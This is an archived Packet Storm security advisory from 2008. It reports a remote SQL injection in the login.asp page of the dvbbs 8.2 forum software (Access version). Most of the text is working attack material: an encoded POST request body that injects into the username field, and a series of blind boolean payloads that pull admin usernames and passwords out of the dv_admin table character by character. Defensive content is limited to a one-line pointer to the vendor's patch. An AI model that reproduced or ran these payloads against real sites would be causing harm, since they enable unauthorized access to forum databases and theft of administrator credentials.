dvbbs-sql.txt

2008-05-29T00:00:00
ID PACKETSTORM:66790
Type packetstorm
Reporter hackerb
Modified 2008-05-29T00:00:00

Description

                                        
                                            `name:  
where (topsec security research group)  
  
email:  
hackerb@hotmail.com  
  
Subject:  
dvbbs8.2(access/sql)version login.asp remote sql injection  
  
danger level:  
critical/High  
  
info:  
dvbbs is prone to multiple sql injection security flaw  
  
interrelated code to access version(exp):  
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271  
  
Examples(access version):  
decide  
Where’ and ‘1’=’1  
where’ and ‘1’=’2  
to get usernamer or password  
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1  
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1  
.......................  
.......................  
where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1  
where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1  
......................  
......................  
  
Solution:  
Authorities patch   
dvbbs web site(http://www.dvbbs.net)  
  
References:  
dvbbs(http://www.dvbbs.net)  
`